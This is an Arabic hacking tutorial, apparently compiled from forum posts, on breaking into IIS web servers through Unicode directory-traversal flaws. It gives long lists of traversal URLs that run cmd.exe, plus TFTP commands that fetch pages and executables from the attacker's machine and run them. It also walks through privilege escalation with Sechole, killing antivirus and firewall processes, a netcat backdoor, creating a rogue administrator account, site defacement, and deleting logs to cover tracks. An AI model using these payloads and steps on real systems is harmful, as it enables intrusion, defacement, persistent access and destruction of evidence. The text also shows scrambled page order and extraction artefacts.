‫‪HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SYSTEM32\PASSFILT.DLL‬‬


‫- اذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ ‪ ASP‬للوصول الهى البيانهات مهن خهالل قاعهدة‬
‫الـ ‪ MySQL‬فسوف نحتاج الى تطبيق ثغرة ( ‪ ) +.htr‬للوصول الى باسورد المسئول عن هذة القاعده‬
                                                                               ‫وهي كالتالي :-‬
‫‪http://www.xxxx.com/default.asp+.htr‬‬


‫عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سهيكربت التنفيهذ فالطريقهة‬
‫صهههحيحة وماعلينههها فقهههط سهههوى سهههحب ملهههف ‪ database.inc‬وقهههراءة محتوياتهههه للعثهههور علهههى اسهههم‬
                                                      ‫المستخدم والباسورد للمسئول عن قاعدة البيانات .‬


                           ‫.‬   ‫‪TFTP‬‬   ‫- تغيير الصفحة الرئيسية للموقع وعملية االب لوود بواسطة برنامج‬
            ‫\:‪c‬‬   ‫قم بانشاء صفحة وضع شعارك عليها واحفظها باسم ‪ index.htm‬على الـ‬                       ‫2-‬


                                                           ‫731‬
‫قم بتشغيل برنامج ‪ TFTP‬ونفذ االمر في الفقرة التالية .‬   ‫6-‬




                   ‫831‬
‫‪/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm‬‬



       ‫‪tftp.exe‬‬         ‫وهو البرنامج الالزم لعمل االب لوود ويجب ان يكون شغال في حالة تنفيذ االمر‬
         ‫"‪"-i‬‬                    ‫وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات‬
       ‫1.1.1.1‬                                     ‫رقم االيبي الخاص بك‬
         ‫‪GET‬‬                     ‫وهو االمر الالزم لطلب الملفات مابين االرسال واالستقبال‬
      ‫‪index.htm‬‬                                     ‫اسم الملف بجهازك‬
‫\‪\inetpub\wwwroot‬‬                                  ‫اسم الدليل في السيرفر‬
      ‫‪index.htm‬‬                                   ‫اسم الملف على السيرفر‬




                                                 ‫- مسح ملفات اللوق حتى ال يتم التعرف عليك .‬
                      ‫23‪ System‬بواسطة االمر :-‬   ‫وتتم هذه العملية من خالل حذف ملحات الـ ‪ Log‬من مجلد‬
‫‪/c+del+c:/winnt/system32/logfiles/*.log‬‬



                                            ‫انتهى ،،،‬




                                              ‫931‬
     ‫" اإلختراق عن طريق اليونيكود (الجزء الثاني) "‬

                                                            ‫<منقول من منتديات شبكة الحزم اإلسالمية>‬


 ‫في الدرس األول كان عبارة عن اوامر اساسية يستطيع الجميع تطبيقها .. اما في هذا الدرس فاألمر يتطلب‬
                                                                            ‫بعض الذكاء والمهارة ..‬


                                                                                             ‫البداية :‬
                                                                                       ‫--------------‬

 ‫عند وجود موقع مصاب بثغرة ما (يونيكود) فان اول شي عليك القيام به هو نسخ مجلد ‪ cmd‬الى 1‪cmd‬‬
                                                                              ‫بهذه الطريقة:‬
                                                       ‫+23‪C+copy+c:\winnt\system‬‬
                   ‫‪c:\winnt\system32\cmd1.exe‬والسبب هو تفعيل امر الكتابة .. ‪Echo‬‬
     ‫وبعد ذلك نفذ الثغرة من الملف الجديد ( ‪ CMD1.exe‬هذا شي يعرفه الجميع ) لكن للتذكير فقط !‬

        ‫االن عند تصفحك لملفات الموقع من المتصفح .. من خالل هذه الثغرة فانه سيكون لديك صالحيات‬
 ‫‪IWAM_USER‬وهذا المستخدم هو عبارة عن يوزر ينتمي للمجموعه ‪ Guest‬وهو اليوزر المسؤوول‬
                                                                         ‫عن تشغيل سيرفر. ‪IIS‬‬
          ‫وبما انه من مجموعة ‪ Guest‬فهو ال يملك صالحيات كثيرة !! اال اذا تم اعداده بشكل سيء :)‬

       ‫اليوجد شي اكثر ادمانا من محاولة الحصول على رووت :) هذا في انظمة ‪ *nix‬اما في ‪Microsot‬‬
‫فالوضع مختلف :) فإن محاولة الحصول على صالحيات ‪ Administrator‬ليس بالسهولة التي تتوقعها :)‬
     ‫فرفع االمتيازات بشكل محلي في انظمة مايكروسوفت ممكن فقط بطرق قليلة ال يتعدى عددها اصابع اليد‬
‫الواحده .. وانا اكتب هذا الموضوع الشر ح كيفية احكام السيطرة على السيرفر والحصول على حساب مكافيء‬
                                                            ‫للمدير :) والتمتع بجميع موارد النظام ..‬

                                                                                 ‫+الملفات المطلوبة :‬
                                                                         ‫‪Sechole.exe‬وملحقاتها.‬
                                                                                         ‫‪Kill.exe‬‬
                                                                                        ‫‪Tlist.exe‬‬
                                                                                       ‫‪ncx99.exe‬‬
                                                                                     ‫‪tftpd32.exe‬‬

                                                                                      ‫جهز العده :) ..‬
                                                               ‫لتوفير الوقت جمعتها في مجلد واحد هنا‬
                                                                          ‫االن سأشر ح عمل كل اداة :‬

   ‫‪1 - Sechole‬وهو اقوى استثمار موجود لرفع االمتيازات بشكل محلي .. وطريقة عمله (بشكل مبسط)‬
  ‫بأنه يعتمد على صدع في نواة ويندوز ان تي .. يستطيع من خالله اغتصاب عملية تابعه لمدير النظام يقوم‬
                                                                      ‫من خاللها برفع امتيازاتك :) .‬

    ‫‪2 - Tlist‬تقوم بعرض جميع العمليات التي تعمل بالخلفيه .. والفائده منها هو اقفال الفايروول + االنتي‬
                                                                                            ‫فايروس :)‬
    ‫‪3- Kill.exe‬عملها متمم لالداة السابقة حيث ستقوم باقفال رقم العملية المستخرج من االداة السابقة .‬
                                    ‫99‪3- NCX‬نسخه مطورة من الباكدوور ‪ NC‬ينصت على المنفذ 88‬
                                                          ‫‪4- TFTP32.exe‬لنقل الملفات الى السيرفر ..‬


                                                ‫041‬
                                      ‫كل ما سبق كان عبارة عن مقدمه :) اما العمل الحقيقي سيبدأ االن :‬



                                                       ‫اوال قم برفع جميع االدوات السابق الى السيرفر ..‬
                                                          ‫ثم قم بتشغيل ‪ ncx99.exe‬بهذا الشكل مثال :‬
     ‫‪http://target/scripts/..À¯../winnt/system32/cmd1.exe?/c+C:\ncx99.exe‬‬
                                                         ‫بعد ذلك قم باالتصال بالموقع على البورت 88 ..‬
                                           ‫ستحصل على سطر اوامر ‪ CMD‬بدون امتيازات. ‪= Guest‬‬
 ‫االن قم بتشغيل االداة .. ‪ TLIST‬ستعرض لك جميع العمليات التي تعمل .. قم بالبحث عن رقم العملية ‪PID‬‬
                                       ‫الخاص باالنتي فايروس ان وجد .. وكذلك اذا وجدت جدار ناري ..‬
                                ‫سجل رقم ‪ PID‬الخاص باالنتي فايروس والفايروول على ورقه جانبيه ..‬
      ‫االن قم بقتل االجراء باالداة ‪ Kill‬بهذا الشكل .. ‪ : KILL.exe PID‬مكان ‪ PID‬تضع رقم العملية :)‬
 ‫يسأل البعض ! مالهدف من اقفال االنتي فايروس ؟ االجابة .. أن التحديثات االخيرة من انتي فايروس تتعامل‬
 ‫مع ‪ Sechole‬على انه باكدور .. واالن بعد اتمام العمليات السابقة بنجا ح .. قم بتشغيل ‪Sechole.exe‬‬
                                                                                      ‫):من المتصفح.‬


               ‫عندها سيتم رفم امتيازات ‪ IWAM_USER‬الى مجموعه.. ‪Administrators‬‬
  ‫االن بإمكانك تنفيذه جميع االوامر بكامل الحريه وبدون اي مشاكل في الصالحيات. ‪Access Denided‬‬
                                     ‫وطبعا اهم شي الكتابة على الصفحه الرئيسية بامر االيكو:‬
                                              ‫+‪C+Echo+Hacked+by+XDeMoNX‬‬
                                                   ‫‪> +C;\inetpub\wwwroot\index‬‬
                                                                                   ‫‪.htm‬‬

                                                                          ‫ولكن ليس هذا كل شي ..‬
  ‫القراصنه االذكياء ال يبحثون فقط عن تغيير الصفحه الرئيسية خصوصا اذا كان الموقع مهم او يحتوي على‬
                                                               ‫معلومات او قواعد بيانات ... إلخ :)‬

     ‫سؤال : هل تستطيع الدخول بهذا اليوزر ؟ ‪ IWAM_USER‬الى اي خدمه مثل تلنت او اف تي بي ؟؟‬
 ‫االجابة : ال .. صحيح اننا قمنا برفع امتيزاته لكننا ال نملك كلمه المرور ! النه تكون مسنده بشكل عشوائي .‬
         ‫سيذهب تفكير البعض الى الحصول على ملف السام وكسره :) هذا ممكن .. لكن يوجد ماهو اسهل .‬
 ‫بما اننا لدينا حساب مكافي لـ ‪ Administrator‬ولكننا ال نملك كلمة المرور . ما رأيك بإضافه يوزر جديد‬
                    ‫باسمك مع باسورد خاصه بك مع امتيازات المدير ايضا !! :) قليل من الذكاء والتفكير :)‬
                                                        ‫قم بانشاء مستند نصي جديد واضف السطر التالي :‬
‫‪net user Demon pass /add && net localgroup administrators Demon /add‬‬
                                                             ‫واالن ‪ Save as‬واحفظها باسم. ‪add.bat‬‬
   ‫توضيح : ما فعلناه سابقا هو انشاء مجلد دفعاتي يقوم بانشاء يوزر جديد ‪ Demon‬وكلمة مرور ‪Pass‬‬
                                                       ‫واضافته الى مجموعة االدمنستريتورز :) المدراء ..‬
                                ‫قم االن برفع الملف ‪ add.bat‬ثم تشغيلها من المتصفح (بواسطة اليونكود)‬
   ‫االن لديك حساب مدير :) وتستطيع الدخول الى اي خدمه .. اف تي بي او تلنت او نت بيوس او غيرها :)‬
    ‫ال تنسى في النهاية مسح االثار واضافة االبواب الخلية الخاصة بك لتسهيل الدخول في المرات القادمه :)‬
   ‫طبعا لن اتوسع في هذا الجانب النه ( لكل شيخ طريقة!) وكل واحد له اسلوب في اخفاء ادواته والتحكم في‬
                                                                                              ‫الملفات .‬

                                                                                    ‫نرجع لنقطة سابقة ..‬
                                                       ‫هل تذكر اني طلبت منك اقفال الفايروول ؟؟ لماذا ؟‬


                                                 ‫141‬
  ‫لو جربت تنفذ االمر ‪ netstat -an‬من خالل سطر اوامر االن سي .. فانك ستجد من المنافذ ما يسر القلب‬
                                                                                                    ‫:)‬
‫%09من السيرفرات اللي دخلتها وكانت محمية بجدران نار :) وجدت المنفذ 931 فيها مفتوحا بدون حمايه‬
                                                                                                    ‫:)‬
                                        ‫لذا فان اقفال الفايرول قد يجعل لك اكثر من خيار السقاط الهدف :)‬

                           ‫اسف على النحو االمالء .. والتنسيق الـ أي كالم :) واختصار المعلومات ايضا .‬

                  ‫باالمكان االستعراض اكثر من ذلك بكثير .. الى درجة الحصول على تحكم رسومي. ‪GUI‬‬



        ‫لكن لم يكون لدي الوقت الكافي .. اذا وجدت وقت فراغ فسأكتب عن طرق اخرى وادوات اخرى مثل‬
         ‫‪GEtAdmin‬و 2‪ Sechole‬وكيفية الحصول على تحكم رسومي بواسطه االداة ‪.. WINvnc‬‬



                                              ‫انتهى،،،‬




                                                ‫241‬
        ‫" معلومات عامة عن كيفية االستفادة من ثغرات‬
                       " ‫اليونيكود‬

                                                                                        >‫<منقول‬
                                                                              >‫<الكاتب: بالك هنتر‬
                        ‫الموضوع يتكلم عن اساليب التحكم في السيرفر عبر اليونيكود مع بعض المتطلبات‬
                                                                                : ‫االدوات المطلوبه‬

                                                                      ‫2) اداة مسح ثغرات يونيكود‬
                                                                      TFTPD ‫6) برنامج سيرفر‬
                                                                        ‫3) معرفة جيده باليونيكود‬
                =================================================
                =================================================
                        ‫2) بأمكانك الحصول على ثغرات اليونيكود من العديد من المواقع او من موقعي‬
                                                               http://www.devil2k.com/
                                                               )) ‫وهذه مهداه مني انا (( بالك هنتر‬
   /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
  /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/c
                                                                        md.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c
                                                                                                :\
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/sys
                                                            tem32/cmd.exe?/c+dir+c:\
                 /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
 /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
                 /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
   /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
 /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c
                                                                                                :\
  /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe
                                                                                   ?/c+dir+c:\
  /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/c
                                                                        md.exe?/c+dir+c:\
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+
                                                                                              c:\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+d
                                                                                           ir+c:\
  /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/c
                                                                        md.exe?/c+dir+c:\
 /MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/sy
                                                           stem32/cmd.exe?/c+dir+c:\
   /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.e
                                                                               xe?/c+dir+c:\
 /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cm
                                                                          d.exe?/c+dir+c:\
   /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../win
                                                    nt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%3
                                     5%63../winnt/system32/cmd.exe?/c+dir+c:\


                                              143
       /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
    /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c
                                                                    +dir+c:\
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd
                                                             .exe?/c+dir+c:\
            /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
          /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
 /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+
                                                                         c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?
                                                                  /c+dir+c:\
   /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.e
                                                               xe?/c+dir+c:\
 /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cm
                                                            d.exe?/c+dir+c:\
   /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../win
                                              nt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%3
                                    5%63../winnt/system32/cmd.exe?/c+dir+c:\
 /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/
                                                          cmd.exe?/c+dir+c:\
                                                                       /cgi-
 bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.e
                                                               xe?/c+dir+c:\
   /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/
                                                          cmd.exe?/c+dir+c:\
   /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/
                                                          cmd.exe?/c+dir+c:\
   /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system
                                                       32/cmd.exe?/c+dir+c:\
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.ex
                                                                e?/c+dir+c:\
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.ex
                                                                e?/c+dir+c:\
  /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.e
                                                               xe?/c+dir+c:\
 /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
                 /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
                      /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
                      /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
                       /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
                       /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
                      /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
                      /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
                     /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
  /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
                                                                        +c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di
                                                                       r+c:\


                                    144
                      /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
                      /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
                     /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
                     /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
                      /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
                     /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
                     /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
                     /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
                      /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
                 /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
             /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
        /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
   /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
  /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system
                                                      32/cmd.exe\?/c+dir+c:\
                                                                       /cgi-
 bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.
                                                              exe?/c+dir+c:\
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32
                                                         /cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system
                                                       32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/
                                                          cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/
                                                          cmd.exe?/c+dir+c:\
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system
                                                       32/cmd.exe?/c+dir+c:\


                                               ‫ من الموقع‬TFTPD ‫6) بأمكانك الحصول على برنامج‬
                                                             http://iisbughelp.4t.com/


      ‫3) معرفة اليونيكود بسيطه جدا يكفي ان تعرف كيف تستطيع االنتقال عبر الهارديسكات وعبر الملفات‬
                                                                            ) ‫(تعمل عبر المتصفح‬

/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+d
                                                                         ir+C:\
                                                     C:\ ‫لقرائه ما بداخل هارديسك‬
/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+d
                                                                         ir+D:\
                                                     D:\ ‫لقرائه ما بداخل هارديسك‬
/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+d
                                                                         ir+E:\
                                                      E:\ ‫لقرائه ما بداخل هارديسك‬


 ‫نقوم بعمل سكان على الموقع لنرى ما به من ثغرات وهنا مثال على ثغرات مبتدأه بالمجلد المطلوب (( اغلب‬
                                                          )) ‫ثغرات اليونيكود تنطلق من هذه المجلدات‬


                                              145
                                                                         ‫2)مثال المجلد ‪msadc‬‬
 ‫‪/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir‬‬
                                                                                            ‫\:‪+C‬‬
                                                                      ‫6) مثال المجلد _‪vti_bin‬‬
‫‪/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di‬‬
                                                                                          ‫\:‪r+C‬‬
      ‫في سيرفرات ‪ IIS‬عند تركيبها (( بشكل عادي )) يكون المجلد الرئيسي للويب تحت اسم معين وهو :‬
                                                                     ‫‪C:\Inetpub\wwwroot‬‬
                                                                                     ‫او في المجلد‬
                                                                     ‫‪D:\Inetpub\wwwroot‬‬
                                                                                     ‫او في المجلد‬
                                                                     ‫‪E:\Inetpub\wwwroot‬‬
                                ‫في العاده يكون في الهارديسك ‪ C‬ولذلك سأكمل شرحي على انه هناك‬
                                          ‫ستجد في هذا المجلد عادة جميع المواقع التي على السيرفر‬

                                                          ‫فلو وجدنا ثغرة يونيكود ما ولتكن‬
‫‪/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir‬‬
                                                                                    ‫\:‪+c‬‬
                              ‫وأردنا الولوج الى هذا الملف لنرى ما به فسنكتب الثغره هكذا :‬
‫‪/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir‬‬
                                                           ‫‪+C:\Inetpub\wwwroot‬‬

          ‫اذا كان السيرفر يحوي عدة مواقع فستجدها كل موقع باسمه ( ستجدها في مجلدات بداخل مجلد الـ‬
                                                             ‫) ‪ wwwroot‬اما لو كان السيرفر عباره‬
                                 ‫عن موقع واحد فقط فستجد كافة الملفات في مجلد الـ ‪ wwwroot‬نفسه‬
 ‫في اغلب الظن يقوم الهاكر بتغيير الصفحة الرئيسيه االولى وعليك ان تعلم انه ليس دائما الصفحة الرئيسيه‬
                                                                     ‫االولى تحمل اسم ‪index.htm‬‬
                                          ‫هناك عدة تسميات وأختصارات لها وهذه بعضها (( معظمها ))‬
                                                                                       ‫‪index.htm‬‬
                                                                                       ‫‪index.asp‬‬
                                                                                    ‫‪default.htm‬‬
                                                                                     ‫‪default.asp‬‬
                                                                                        ‫‪main.htm‬‬
                                                                                        ‫‪main.asp‬‬

     ‫لنفرض االن اننا وجدنا ان الصفحة الرئيسيه للموقع في مجلدنا ‪ wwwroot‬هي ‪ index.htm‬فكيف‬
                                             ‫سنقوم بتغييرها وهو ما يهمنا تقريبا من عملية‬
                                                                             ‫االختراق هذه‬

         ‫سنقوم اوال بتغيير اسم الملف من ‪ index.htm‬الى اي اسم اخر يخطر ببالك وليكن ‪ss.htm‬‬
 ‫طبعا سنرسل االمر عبر ثغرة اليونيكود من المتصفح لديك وسنقوم بتغيير الداله ‪ c+dir‬الى الداله ‪c+ren‬‬
   ‫(( عليك ان تعرف ان االوامر التي سوتضع هي نفس االوامر الموجوده في ‪ Dos‬وفي ‪Command‬‬
                                        ‫‪ Prompt‬فعليك ان تكون عارفا بما هو االمر المراد استخدامه‬
                                                                           ‫المهم ستكتب الثغره هكذا :‬
‫‪/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren‬‬
                                           ‫‪+C:\Inetpub\wwwroot\index.htm+ss.htm‬‬

                                      ‫وهكذا فقد تم تغيير اسم الصفحة من ‪ index.htm‬الى ‪ss.htm‬‬
                                                                     ‫ارأيتم كم هو سهل :) ؟‬


                                               ‫641‬
‫‪A‬يبدو انك ايها المخترق لم تكتفي باغالق الصفحة الرئيسيه للموقع فانت تريد ان تضع صفحة بموضوع اخر‬
                                                                           ‫وليكن الموضوع هو‬
                                                                                 ‫!!!‪Hacked‬‬
                                                     ‫فكيف سنرسلها في صفحة ‪ index.htm‬؟؟‬
 ‫هناك عدة طرق ومنها سأذكر هذه الطريقه وهي عبر االتصال بمنفذ ‪ TFTP‬الذي ستكون فيه انت في وضع‬
                                                                   ‫السيرفر والموقع الذي امامك‬
                                                                             ‫في وضع الكالينت‬

                                                                                         ‫كيف سيتم هذا ؟‬

  ‫اوال قم بتركيب نظام سيرفر ‪ TFTP‬على جهازك ( البرنامج المذكور في اول الموضوع من افضل البرامج‬
                                                    ‫وهناك برنامج اخر اكثر احترافا ولكن هذا يكفي )‬
                                                            ‫االن ضع السيرفر الرئيسي في \:‪ C‬لديك‬
                            ‫قم بتصميم صفحة خفيفه وسريعه وسمها ‪ index.htm‬وضعها في \:‪C‬‬

                                        ‫االن نريد ان نرسل للسيرفر الملف الجديد من \:‪ C‬لدينا الى ملف‬
                                                                            ‫‪C:\inetpub\wwwroot‬‬
   ‫ال ليس االمر صعبا ففي نظم ميكروسوفت يوجد امر (( هو باألصح برنامجا منفصال )) يحمل اسم ‪TFTP‬‬
                                                                    ‫وهو عباره عن كالينت بسيط يستخدم‬
    ‫بروتوكول ‪ TFTP‬وهو بروتوكول بسيط جدا جدا (( يسميه البعض البروتوكول التافه )) يقوم بسحب او‬
                                                                           ‫ارسال الملفات من والى الجهاز‬
                                                     ‫نحن نريد ان يسحب ملفا من جهازنا فكيف لنا ذلك ؟‬
                                                ‫طبعا لو كنا في غير اليونيكود لكتبنا توليفة االمر التالي :‬
                                         ‫‪tftp.exe -i XXX.XXX.XXX.XXX get index.htm‬‬
                                                           ‫‪C:\inetpub\wwwroot\index.htm‬‬
                           ‫(( ‪ XXX.XXX.XXX.XXX‬تعني اي بي السيرفر المراد سحب الملف منه ))‬
        ‫في توليفة هذا االمر يقوم الكالينت بطلب الملف المسمى ‪ index.htm‬ليضعه في جهازه في المجلد‬
                                                                                            ‫‪wwwroot‬‬
                        ‫ولكن ال تنسى فشكل توليفة االوامر يختلف من الوضع العادي عن وضع اليونيكود‬
                                                                                           ‫فما هو الحل ؟‬
                                  ‫الحل هو ان تحول توليفة االمر الى يونيكود لتضعه في الثغره التي لديك‬
                                                    ‫بعد تحويل االمر الى يونيكود سيصبح شكله كالتالي :‬
                                                                                          ‫-"+‪tftp.exe‬‬
   ‫‪i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm‬‬
                                                                    ‫ياللروعه لقد تجاوزنا العقبه بالفعل :)‬

                                   ‫االن قم بتشغيل سيرفر الـ ‪ TFTP‬وقم بتجهيز ملف الـ ‪index.htm‬‬
 ‫وقم باالتصال مع الموقع عبر ثغرة اليونيكود المضاف اليها هذه التوليفه ليصبح في النهايه على هذا النحو :‬
‫‪/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+tf‬‬
                                                                                         ‫-"+‪tp.exe‬‬
   ‫‪i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm‬‬

                       ‫وهكذا قمنا بتحميل الصفحة الى االنترنت وانتيهنا من عملية االختراق (( تقريبا :) ))‬
    ‫ملحوظه : يمكنك ان تقوم بتحميل ملفات ‪ EXE‬ايضا وتشغيلها على السيرفر بنفس االسلوب وهذا مثال :‬
   ‫لنفرض اننا نريد تحميل ملف ‪ EXE‬على السيرفر وسميناه ‪ hunter.exe‬ونريد تشغيله فكيف لنا ذلك ؟‬
                                                                                          ‫سنتبع االتي :‬
‫نقوم بتحميل الملف على السيرفر كما قمنا بتحميل ‪ index.htm‬ونضعه في \:‪ C‬للسيرفر عبر هذه التوليفه‬
                                                                                                      ‫:‬
‫‪/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+tf‬‬
              ‫‪tp.exe+"-i"+XXX.XXX.XXX.XXX+GET+hunter.exe+C:\hunter.exe‬‬


                                                 ‫741‬
                                                   ‫بعد ان يتم تحميل الملف سنشغله عبر تنفيذ هذا االمر‬

                   ‫‪/msadc/..%c1%9c../..%c1%9c../..%c1%9c../hunter.exe‬‬
                                                      ‫او عن طريق هذا االمر‬
‫‪/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+h‬‬
                                                               ‫‪unter.exe‬‬


    ‫اآلن وقد قاربنا على االنتهاء بقي لدينا في السيرفر عمل واحد فقط اال وهو مسح ملفات اللوج *.‪log‬‬
                                                             ‫وسيكون ذلك عن طريق هذا االمر :‬
‫‪/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del‬‬
                                                                                ‫‪+C:\*.log/s‬‬

 ‫هناك انواع اخرى من الملفات يتم تخزين فيها بعض المعلومات ويفضل مسحها ايضا وهي مثل الملفات ذات‬
                                                                                     ‫االمتداد ‪tmp‬‬
                                                                   ‫وهذا امر مسحها عبر اليونيكود :‬
‫‪/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del‬‬
                                                                                   ‫‪+C:\*.tmp/s‬‬
     ‫ايضا ملحوظه مهمه وهي ان ال تبقى اي معلومات عنك في السيرفر كما يفعل البعض بذكر اسمائهم او‬
                                                      ‫ايميالتهم الحقيقيه قم بمسح اي شيء يدل عليك‬
                                         ‫او على عملية االختراق (( حاول ان تصل الى هذا المستوى ))‬
‫هناك عدد من االشياء واالفكار لن اتطرق اليها مثل ارسال فايروس ما او امر على ملف ‪ bat‬حتى تتمكن من‬
                                                         ‫وضع مشكله كبيره في السيرفر لكي ال يعمل‬
 ‫او ان ترسل فايروس يقوم بمحو جميع ملفات النظام او ان تمرز نفسك لديهم في السيرفر عن طريق برامج‬
                                                                 ‫التحكم عن بعد و اخفائها بشكل جيد‬
                               ‫في المجلدات ذات الملفات الكثير (( مثل )) 23‪ system‬والكثير الكثير‬

‫______________________________________________________________‬
                                                                        ‫__________________‬
    ‫ملحوظات : لن تعمل هذه الثغره في كل الحاالت فهناك بعض السيرفرات يقومون بقطع الطريق عليك عن‬
                                                                 ‫طريق مسح ملف ‪ tftp‬من سيرفراتهم‬
 ‫(( الملف المسؤول عن ذلك موجود في المجلد )) 23‪ system‬وبعض السيرفرات قامت بعملية الترقيع ((‬
                                                             ‫اصدرت ميكروسوفت ترقيعا لهذه الثغره ))‬
